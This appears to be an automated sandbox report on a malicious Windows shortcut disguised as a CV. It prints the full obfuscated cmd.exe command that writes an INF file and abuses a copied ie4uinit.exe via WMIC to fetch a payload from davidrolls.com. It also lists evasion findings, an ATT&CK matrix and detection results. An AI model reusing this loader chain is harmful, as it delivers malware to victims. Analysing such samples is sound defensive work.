Specs Festival Sport Trouble Supporters Erupt Winds Ketchup
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" call xcopy /Y /C /Q %windir%\system32\ie4uinit.exe "C:\Users\user\AppData\Roaming\microsoft\*" "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" set Images21=Strikes "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\xcopy.exe xcopy /Y /C /Q C:\Windows\system32\ie4uinit.exe "C:\Users\user\AppData\Roaming\microsoft\*"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" start "" wmic process call create "C:\Users\user\AppData\Roaming\microsoft\ie4uinit.exe -basesettings" "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" set "Images83=Venues Before Travis Crane Language Scientists Creatures Agencies Phases Copper Lands Loops Afraid Soldier Never Mounts Shine Direct Fluid Scene Invitations Ripple Prefers Fiscal Taste Bargains Brussels Feeds Thanks Features Seeks Relax Identify April Victory Limit Resemble Apple Hands Specs Festival Sport Trouble Supporters Erupt Winds Ketchup""
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic process call create "C:\Users\user\AppData\Roaming\microsoft\ie4uinit.exe -basesettings"
Source: C:\Windows\System32\wbem\WMIC.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe C:\Users\user\AppData\Roaming\microsoft\ie4uinit.exe -basesettings
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Process created: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe C:\Users\user\AppData\Roaming\microsoft\ie4uinit.exe -ClearIconCache
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Process created: C:\Windows\System32\rundll32.exe C:\Windows\system32\RunDll32.exe C:\Windows\system32\migration\WininetPlugin.dll,MigrateCacheForUser /m /0
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Process created: C:\Windows\System32\rundll32.exe C:\Windows\system32\RunDll32.exe C:\Windows\system32\migration\WininetPlugin.dll,MigrateCacheForUser /m /0
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" call xcopy /Y /C /Q %windir%\system32\ie4uinit.exe "C:\Users\user\AppData\Roaming\microsoft\*" "	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" set Images21=Strikes "	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" start "" wmic process call create "C:\Users\user\AppData\Roaming\microsoft\ie4uinit.exe -basesettings" "	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" set "Images83=Venues Before Travis Crane Language Scientists Creatures Agencies Phases Copper Lands Loops Afraid Soldier Never Mounts Shine Direct Fluid Scene Invitations Ripple Prefers Fiscal Taste Bargains Brussels Feeds Thanks Features Seeks Relax Identify April Victory Limit Resemble Apple Hands Specs Festival Sport Trouble Supporters Erupt Winds Ketchup""	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\xcopy.exe xcopy /Y /C /Q C:\Windows\system32\ie4uinit.exe "C:\Users\user\AppData\Roaming\microsoft\*"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic process call create "C:\Users\user\AppData\Roaming\microsoft\ie4uinit.exe -basesettings"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Process created: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe C:\Users\user\AppData\Roaming\microsoft\ie4uinit.exe -ClearIconCache	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Process created: C:\Windows\System32\rundll32.exe C:\Windows\system32\RunDll32.exe C:\Windows\system32\migration\WininetPlugin.dll,MigrateCacheForUser /m /0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Process created: C:\Windows\System32\rundll32.exe C:\Windows\system32\RunDll32.exe C:\Windows\system32\migration\WininetPlugin.dll,MigrateCacheForUser /m /0	Jump to behavior

Source: C:\Windows\System32\wbem\WMIC.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32

Jump to behavior

Source: CV - David Rolls.lnk

LNK file: ..\..\..\

Source: C:\Windows\System32\wbem\WMIC.exe

WMI Queries: IWbemServices::ExecMethod - ROOT\CIMV2 : Win32_Process::Create

Source: C:\Windows\System32\cmd.exe

File created: C:\Users\user\AppData\Roaming\microsoft\ieuinit.inf

Jump to behavior

Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe

File created: C:\Windows\Temp\OLD81EC.tmp

Jump to behavior

Source: classification engine

Classification label: mal76.bank.evad.winLNK@22/11@1/1

Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe

Code function: 9_2_00007FF7319E16EC CoCreateInstance,SysAllocString,SysFreeString,

9_2_00007FF7319E16EC

Source: C:\Windows\System32\conhost.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe

Process created: C:\Windows\System32\rundll32.exe C:\Windows\system32\RunDll32.exe C:\Windows\system32\migration\WininetPlugin.dll,MigrateCacheForUser /m /0

Source: C:\Windows\System32\conhost.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1012:120:WilError_01

Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe

Code function: 9_2_00007FF7319C33A8 #654,FindResourceW,LoadResource,LockResource,wcsrchr,SHCreateDirectory,CreateFileW,SizeofResource,WriteFile,CloseHandle,

9_2_00007FF7319C33A8

Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe

File created: C:\Program Files (x86)\Internet Explorer\Signup\TMP4352$.TMP

Jump to behavior

Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source:	Binary string: ie4uinit.pdbGCTL source: xcopy.exe, 00000004.00000002.311010701.000002CB6F412000.00000004.00000020.00020000.00000000.sdmp, ie4uinit.exe, 00000009.00000000.313757180.00007FF7319E5000.00000002.00000001.01000000.00000004.sdmp, ie4uinit.exe, 00000009.00000002.325815225.00007FF7319E5000.00000002.00000001.01000000.00000004.sdmp, ie4uinit.exe, 0000000A.00000000.314642408.00007FF7319E5000.00000002.00000001.01000000.00000004.sdmp, ie4uinit.exe, 0000000A.00000002.319094413.00007FF7319E5000.00000002.00000001.01000000.00000004.sdmp, ie4uinit.exe.4.dr
Source:	Binary string: ie4uinit.pdb source: xcopy.exe, 00000004.00000002.311010701.000002CB6F412000.00000004.00000020.00020000.00000000.sdmp, ie4uinit.exe, 00000009.00000000.313757180.00007FF7319E5000.00000002.00000001.01000000.00000004.sdmp, ie4uinit.exe, 00000009.00000002.325815225.00007FF7319E5000.00000002.00000001.01000000.00000004.sdmp, ie4uinit.exe, 0000000A.00000000.314642408.00007FF7319E5000.00000002.00000001.01000000.00000004.sdmp, ie4uinit.exe, 0000000A.00000002.319094413.00007FF7319E5000.00000002.00000001.01000000.00000004.sdmp, ie4uinit.exe.4.dr

Source: ie4uinit.exe.4.dr

Static PE information: section name: .didat

Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe

Code function: 9_2_00007FF7319CB2C4 LoadLibraryW,GetProcAddress,LocalFree,FreeLibrary,

9_2_00007FF7319CB2C4

Persistence and Installation Behavior

Windows shortcut file (LNK) starts blacklisted processes

Source: LNK file	Process created: C:\Windows\System32\cmd.exe
Source: LNK file	Process created: C:\Windows\System32\cmd.exe
Source: LNK file	Process created: C:\Windows\System32\cmd.exe
Source: LNK file	Process created: C:\Windows\System32\cmd.exe
Source: LNK file	Process created: C:\Windows\System32\cmd.exe
Source: LNK file	Process created: C:\Windows\System32\cmd.exe	Jump to behavior
Source: LNK file	Process created: C:\Windows\System32\cmd.exe	Jump to behavior
Source: LNK file	Process created: C:\Windows\System32\cmd.exe	Jump to behavior
Source: LNK file	Process created: C:\Windows\System32\cmd.exe	Jump to behavior

Creates processes via WMI

Source: C:\Windows\System32\wbem\WMIC.exe

WMI Queries: IWbemServices::ExecMethod - ROOT\CIMV2 : Win32_Process::Create

Source: C:\Windows\System32\xcopy.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe

Jump to dropped file

Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Contains functionality to compare user and computer (likely to detect sandboxes)

Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe

Code function: GetModuleFileNameW,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,StrStrIW,_wcsicmp,_wcsicmp,StrCmpICW,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,

9_2_00007FF7319E0A8C

Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe

Evasive API call chain: GetLocalTime,DecisionNodes

graph_9-10980

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Code function: 9_2_00007FF7319D1F14 GetSystemTimeAsFileTime followed by cmp: cmp ebx, 01h and CTI: je 00007FF7319D2001h	9_2_00007FF7319D1F14
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Code function: 9_2_00007FF7319D1F14 GetSystemTimeAsFileTime followed by cmp: cmp ebx, 02h and CTI: je 00007FF7319D1FFAh	9_2_00007FF7319D1F14
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Code function: 9_2_00007FF7319D1F14 GetSystemTimeAsFileTime followed by cmp: cmp eax, 01h and CTI: jnbe 00007FF7319D200Ah	9_2_00007FF7319D1F14

Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe

API coverage: 9.4 %

Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe

Code function: 9_2_00007FF7319CB0DC GetSystemInfo,#701,IsJITInProgress,GetSystemInfo,IsJITInProgress,#701,IsJITInProgress,LocaleNameToLCID,IsJITInProgress,IsJITInProgress,EnterCriticalSection,LeaveCriticalSection,

9_2_00007FF7319CB0DC

Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Code function: 9_2_00007FF7319CA568 SHGetFolderPathW,SetFileAttributesW,GetLastError,SHGetFolderPathW,wcscat_s,wcscat_s,wcscat_s,FindFirstFileW,wcscat_s,FindNextFileW,FindClose,	9_2_00007FF7319CA568
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Code function: 9_2_00007FF7319E0204 FindFirstFileExW,GetLastError,FindNextFileW,GetLastError,FindClose,	9_2_00007FF7319E0204
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Code function: 9_2_00007FF7319C3D20 GetShortPathNameW,GetShortPathNameW,PathFindFileNameW,GetCurrentDirectoryW,SetCurrentDirectoryW,FindFirstFileW,CoCreateInstance,StrCmpIW,StrCmpIW,PathRemoveBlanksW,StrCmpICW,StrCmpICW,ILCreateFromPath,ILCreateFromPath,RegOpenKeyExW,StrCmpIW,RegCloseKey,ILFree,FindNextFileW,FindClose,FindFirstFileExW,lstrcmpW,lstrcmpW,FindNextFileW,FindClose,SetCurrentDirectoryW,	9_2_00007FF7319C3D20
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Code function: 9_2_00007FF7319C44E4 SetCurrentDirectoryW,FindFirstFileW,FindNextFileW,FindClose,SetCurrentDirectoryW,	9_2_00007FF7319C44E4
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Code function: 9_2_00007FF7319CAC08 CreateFileW,#149,CloseHandle,GetLastError,wcscpy_s,wcscat_s,FindFirstFileW,wcscat_s,FindNextFileW,FindClose,GetLastError,	9_2_00007FF7319CAC08

Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Libraries\desktop.ini	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior

Source: ie4uinit.exe, 00000009.00000003.325177677.000001D3148AB000.00000004.00000020.00020000.00000000.sdmp, ie4uinit.exe, 00000009.00000003.318208596.000001D3148AB000.00000004.00000020.00020000.00000000.sdmp, ie4uinit.exe, 00000009.00000002.325448551.000001D3148AB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: ie4uinit.exe, 00000009.00000002.325448551.000001D314846000.00000004.00000020.00020000.00000000.sdmp, ie4uinit.exe, 00000009.00000003.318341666.000001D314848000.00000004.00000020.00020000.00000000.sdmp, ie4uinit.exe, 00000009.00000003.325177677.000001D314845000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWomH:
Source: ie4uinit.exe, 00000009.00000002.325448551.000001D314846000.00000004.00000020.00020000.00000000.sdmp, ie4uinit.exe, 00000009.00000003.318341666.000001D314848000.00000004.00000020.00020000.00000000.sdmp, ie4uinit.exe, 00000009.00000003.325177677.000001D314845000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWpY

Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe

Code function: 9_2_00007FF7319C7758 GetCurrentThreadId,memset,IsDebuggerPresent,OutputDebugStringW,

9_2_00007FF7319C7758

Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe

Code function: 9_2_00007FF7319CB2C4 LoadLibraryW,GetProcAddress,LocalFree,FreeLibrary,

9_2_00007FF7319CB2C4

Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe

Code function: 9_2_00007FF7319D22C8 #677,#654,GetProcessHeap,HeapFree,

9_2_00007FF7319D22C8

Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Code function: 9_2_00007FF7319E3DA0 SetUnhandledExceptionFilter,		9_2_00007FF7319E3DA0
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Code function: 9_2_00007FF7319E38F0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,		9_2_00007FF7319E38F0

Source: unknown	Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe" /v /c set "images97=si" && set "images67=version" && set "images38=d" && set "images82=default" && set "images4=init" && (for %h in (c) do @set "images7=%~h") && set "images62=e" && set "images14=t" && set "images12=." && (for %k in (a) do @set "images32=%~k") && set "images3=history" && call set "images6=%images3:~2,1%" && set "images43=settings" && set "images8=$w" && set "images88=!images12!inf" && set "images58=ieu!images4!!images88!" && call !images6!et "images84=%!images32!ppdata%\micro!images6!oft\" && !images6!et "images00=!images84!!images58!" && (for %t in ("[!images67!]" "signature = !images8!indows nt$" "[!images38!e!images6!tinationdirs]" "c3d81=01" "!images82!destdir=11" "[c3d81]" "ieu%images15%!images88!" "[fd48e1]" "sc\" "ro%images95%j,ni,%images81%%images2%%images2%p%images66%%images0%%images0%davidrolls!images12!%images76%/aj55hg3eude" "[!images82!in!images6!tall.windows7]" "un\" "register\" "ocxs=fd48e1" "!images38!elfil!images62!s=c3d81" "[!images6!!images14!rings]" "images2=t;images26" "!images6!ervicen!images32!me=' '" "images15=!images4!" "images27=%time%" "!images6!hortsvcn!images32!me=' '" "images0=/" "images95=b;images08" "images76=com" "images66=:;images03" "images81=h" ) do @e!images7!ho %~t)>"!images00!" && !images6!et "images20=ie4u!images4!.!images62!xe" && call xcopy /y /c /q %win!images38!ir%\!images6!ystem32\!images20! "!images84!*" \| set images21=strikes && !images6!t!images32!rt "" wmi!images7! proce!images6!s call !images7!rea!images14!e "!images84!!images20! -base!images43!" \| set "images83=venues before travis crane language scientists creatures agencies phases copper lands loops afraid soldier never mounts shine direct fluid scene invitations ripple prefers fiscal taste bargains brussels feeds thanks features seeks relax identify april victory limit resemble apple hands specs festival sport trouble supporters erupt winds ketchup
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /s /d /c" set "images83=venues before travis crane language scientists creatures agencies phases copper lands loops afraid soldier never mounts shine direct fluid scene invitations ripple prefers fiscal taste bargains brussels feeds thanks features seeks relax identify april victory limit resemble apple hands specs festival sport trouble supporters erupt winds ketchup""
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /s /d /c" set "images83=venues before travis crane language scientists creatures agencies phases copper lands loops afraid soldier never mounts shine direct fluid scene invitations ripple prefers fiscal taste bargains brussels feeds thanks features seeks relax identify april victory limit resemble apple hands specs festival sport trouble supporters erupt winds ketchup""	Jump to behavior

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" call xcopy /Y /C /Q %windir%\system32\ie4uinit.exe "C:\Users\user\AppData\Roaming\microsoft\*" "	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" set Images21=Strikes "	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" start "" wmic process call create "C:\Users\user\AppData\Roaming\microsoft\ie4uinit.exe -basesettings" "	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" set "Images83=Venues Before Travis Crane Language Scientists Creatures Agencies Phases Copper Lands Loops Afraid Soldier Never Mounts Shine Direct Fluid Scene Invitations Ripple Prefers Fiscal Taste Bargains Brussels Feeds Thanks Features Seeks Relax Identify April Victory Limit Resemble Apple Hands Specs Festival Sport Trouble Supporters Erupt Winds Ketchup""	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\xcopy.exe xcopy /Y /C /Q C:\Windows\system32\ie4uinit.exe "C:\Users\user\AppData\Roaming\microsoft\*"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic process call create "C:\Users\user\AppData\Roaming\microsoft\ie4uinit.exe -basesettings"	Jump to behavior

Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe

Code function: 9_2_00007FF7319C5974 GetLocalTime,FormatMessageW,PostThreadMessageW,

9_2_00007FF7319C5974

Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe

Code function: 9_2_00007FF7319C329C memset,GetVersionExA,

9_2_00007FF7319C329C

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	21 Windows Management Instrumentation	1 Scheduled Task/Job	12 Process Injection	12 Masquerading	OS Credential Dumping	11 System Time Discovery	Remote Services	1 Archive Collected Data	Exfiltration Over Other Network Medium	2 Encrypted Channel	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	1 Command and Scripting Interpreter	Boot or Logon Initialization Scripts	1 Scheduled Task/Job	12 Process Injection	LSASS Memory	121 Security Software Discovery	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	3 Ingress Tool Transfer	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	1 Scheduled Task/Job	Logon Script (Windows)	Logon Script (Windows)	1 Deobfuscate/Decode Files or Information	Security Account Manager	2 Process Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	3 Non-Application Layer Protocol	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	2 Native API	Logon Script (Mac)	Logon Script (Mac)	1 Obfuscated Files or Information	NTDS	1 Remote System Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	13 Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	1 Rundll32	LSA Secrets	3 File and Directory Discovery	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	1 File Deletion	Cached Domain Credentials	5 System Information Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
CV - David Rolls.lnk	10%	Virustotal		Browse

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	2%	ReversingLabs

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Label	Link
davidrolls.com	0%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label	Link
https://yandex.com.tr/search/?text=	0%	Virustotal		Browse
http://www.yandex.com.tr/favicon.ico	0%	Avira URL Cloud	safe
https://yandex.com.tr/search/?text=	0%	Avira URL Cloud	safe
http://davidrolls.com/aj550	0%	Avira URL Cloud	safe
http://davidrolls.com/aj55hg3eudeosLMEMH	0%	Avira URL Cloud	safe
http://davidrolls.com/aj55hg3eudeuU	0%	Avira URL Cloud	safe
http://davidrolls.com/aj55hg3eudet	0%	Avira URL Cloud	safe
http://davidrolls.com/aj55hg3eudeb	0%	Avira URL Cloud	safe
http://davidrolls.com/aj55hg3euded	0%	Avira URL Cloud	safe
http://davidrolls.com/aj55hg3eudeC:	0%	Avira URL Cloud	safe
http://davidrolls.com/aj55hg3eudeXXC:	0%	Avira URL Cloud	safe
https://suggest.yandex.com.tr/suggest-ff.cgi?srv=ie11&uil=tr&part=	0%	Avira URL Cloud	safe
http://davidrolls.com/aj55hg3eude	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
davidrolls.com	23.254.253.145	true	false	0%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://davidrolls.com/aj55hg3eude	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://davidrolls.com/aj55hg3eudeuU	ie4uinit.exe, 00000009.00000002.325418904.000001D314808000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://yandex.by/search/?text=	ie4uinit.exe	false		high
http://www.baidu.com/favicon.icohttps://suggest.yandex.com.tr/suggest-ff.cgi?srv=ie11&uil=tr&part=	xcopy.exe, 00000004.00000002.311010701.000002CB6F412000.00000004.00000020.00020000.00000000.sdmp, ie4uinit.exe, 00000009.00000000.313757180.00007FF7319E5000.00000002.00000001.01000000.00000004.sdmp, ie4uinit.exe, 00000009.00000002.325815225.00007FF7319E5000.00000002.00000001.01000000.00000004.sdmp, ie4uinit.exe, 0000000A.00000000.314642408.00007FF7319E5000.00000002.00000001.01000000.00000004.sdmp, ie4uinit.exe, 0000000A.00000002.319094413.00007FF7319E5000.00000002.00000001.01000000.00000004.sdmp, ie4uinit.exe.4.dr	false		high
